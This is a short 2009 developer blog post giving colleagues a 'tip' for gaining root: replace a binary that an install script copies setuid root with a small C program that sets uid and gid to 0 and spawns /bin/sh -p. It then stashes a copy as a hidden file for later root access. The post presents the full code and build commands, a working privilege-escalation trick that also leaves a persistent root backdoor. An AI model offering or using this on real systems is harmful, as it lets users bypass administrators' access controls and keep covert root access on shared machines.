Peeter Joot's (OLD) Blog.

Math, physics, perl, and programming obscurity.

How to get a root shell if you can modify code that runs setuid root.

Posted by peeterjoot on October 2, 2009

A tip for fellow developers in the unnamed software development project I work on.

I am often suprised that it isn’t 100% general knowledge in the how to make yourself a root shell if you have permission to modify code that is “installed” setuid root. It is as simple as executing code like the following, once giving yourself permission to do so:

/* myRootShellCode.c */
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>

int main(void)
   setreuid(0, 0);
   setregid(0, 0); /* a convience since some system stuff likes gid=0
                          * better than the system group. */

   putenv("PS1=# ") ;
   execl("/bin/sh", "sh", "-p", NULL);

   return 1 ;

Build this, and place it in the path that your setuid-root program will be copied from:

cd /vbs/engn/XXe
cc -o XXXstart ./myRootShellCode.c  # XXXstart changed to protect the innocent

Now run your “install-script” and you have root. You’ll want to save this executable for convienience (unless you are worried about it being abused;) That part goes something like:

$ XXXstart
# mv XXXstart ~/.funWithRoot
# exit

You’ll want to undo your change to XXXstart so you can debug the code of interest (possibly XXXstart itself).

One Response to “How to get a root shell if you can modify code that runs setuid root.”

  1. […] 8200 warden    25     peeter joot root shell    11; […]

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: